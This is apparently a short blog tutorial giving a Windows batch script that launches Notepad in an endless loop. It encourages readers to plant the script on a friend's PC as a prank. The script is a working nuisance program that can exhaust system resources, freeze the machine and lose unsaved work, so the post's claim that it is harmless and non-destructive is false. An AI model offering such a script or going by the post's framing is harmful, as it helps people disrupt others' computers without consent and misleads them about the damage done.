How To Make Harmless Virus
This is step by step tutorial that explains how to make harmless virus that open the notepad file continuously.This is non-destructive virus to your computer system. If you want to have some fun with your friends,drop this cool harmless virus into his pc. .
1) Launch Notepad
2) Type this code into notepad
Code:
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
3) save as filename.bat for example notepad.bat
0 comments:
Post a Comment